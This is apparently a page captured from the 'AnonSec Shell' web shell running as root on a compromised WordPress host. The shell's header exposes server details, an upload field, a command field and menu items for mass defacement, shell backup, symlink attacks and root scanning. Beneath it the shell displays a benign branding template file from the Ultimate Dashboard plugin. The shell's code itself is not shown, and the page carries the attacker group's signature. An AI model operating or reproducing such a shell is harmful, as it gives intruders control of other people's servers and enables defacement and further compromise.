AnonSec Shell
Server IP : 104.21.14.48  /  Your IP : 18.226.87.170   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/ultimate-dashboard/modules/branding/templates/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/plugins/ultimate-dashboard/modules/branding/templates//branding-template.php
<?php
/**
 * Branding page template.
 *
 * @package Ultimate_Dashboard
 */

defined( 'ABSPATH' ) || die( "Can't access directly" );

return function () {
	?>

	<div class="wrap heatbox-wrap udb-branding-page">

		<div class="heatbox-header heatbox-margin-bottom">

			<div class="heatbox-container heatbox-container-center">

				<div class="logo-container">

					<div>
						<span class="title">
							<?php echo esc_html( get_admin_page_title() ); ?>
							<span class="version"><?php echo ULTIMATE_DASHBOARD_PLUGIN_VERSION; ?></span>
						</span>
						<p class="subtitle"><?php _e( 'White label & rebrand your WordPress installation.', 'ultimate-dashboard' ); ?></p>
					</div>

					<div>
						<img src="<?php echo esc_url( ULTIMATE_DASHBOARD_PLUGIN_URL ); ?>/assets/img/logo.png">
					</div>

				</div>

			</div>

		</div>

		<form method="post" action="options.php">

			<div class="heatbox-container heatbox-container-center">

				<h1 style="display: none;"></h1>

				<?php settings_fields( 'udb-branding-group' ); ?>

				<div class="heatbox">
					<?php do_settings_sections( 'udb-branding-settings' ); ?>
				</div>

				<?php do_action( 'udb_after_branding_layout_metabox' ); ?>

				<div class="heatbox">
					<?php do_settings_sections( 'udb-darkmode-settings' ); ?>
				</div>

				<?php do_action( 'udb_after_darkmode_metabox' ); ?>

				<div class="heatbox">
					<?php
					do_settings_sections( 'udb-admin-colors-settings' );

					if ( udb_is_pro_active() ) {
						?>

						<div class="heatbox-overlay"></div>

						<?php
					}
					?>
				</div>

				<?php do_action( 'udb_after_admin_colors_metabox' ); ?>

				<div class="heatbox">
					<?php
					do_settings_sections( 'udb-admin-logo-settings' );

					if ( udb_is_pro_active() ) {
						?>

						<div class="heatbox-overlay"></div>

						<?php
					}
					?>
				</div>

				<?php do_action( 'udb_after_admin_logo_metabox' ); ?>

				<div class="heatbox">
					<?php do_settings_sections( 'udb-branding-misc-settings' ); ?>
				</div>

				<?php do_action( 'udb_after_branding_misc_metabox' ); ?>

				<?php submit_button( '', 'button button-primary button-larger' ); ?>

			</div>

		</form>

	</div>

	<?php
};

Anon7 - 2022
AnonSec Team